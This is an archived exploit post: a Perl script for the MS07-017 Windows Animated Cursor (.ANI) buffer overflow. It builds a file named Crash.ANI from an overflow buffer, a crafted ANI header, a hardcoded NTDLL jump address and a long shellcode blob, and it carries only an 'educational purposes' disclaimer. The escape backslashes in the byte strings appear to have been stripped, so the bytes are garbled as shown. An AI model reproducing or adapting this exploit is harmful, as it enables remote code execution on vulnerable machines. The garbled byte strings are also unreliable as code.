Home / os / winme

msanimated-overflow.txt

Posted on 16 January 2010

#MS Animated Cursor .ANI BOF (Perl Edition ) (MS07-017)
#Discovered by Alex Sotirov from Determina,So all rights are reserved to him!
#Written by Jacky!
#This exploit is written in Perl , and it's the first MS07-017 exploit ( As i saw ) which be written in perl!
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !
my $file="Crash.ANI";

my $junk="A"x1024;

my $aniheader="x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68".

"x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00".

"x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02".

"x61x6Ex69x68xA8x03x00x00";

my $jmpaddress=pack('V',0x7C941EED); # Address from NTDLL.dll

my $shellcode="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90".

"x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f".

"x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a".

"x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e".

"xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4".

"x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1".

"xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99".

"x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5".

"xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b".

"x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7".

"xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3".

"x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a".

"x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e".

"xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4".

"xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed".

"x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62".

"xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8".

"x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76".

"x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7".

"x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84".

"xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a".

"x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed".

"xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85";

my $payload=$junk.$aniheader.$jmpaddress.$shellcode;

open(INI,">$file");

print INI $payload;

sleep(5);

print "[+]File Created Successfully!n";

print "[+]Written by Jacky!n";

sleep(5);

close(INI);

 

TOP

Malware :

Exploits :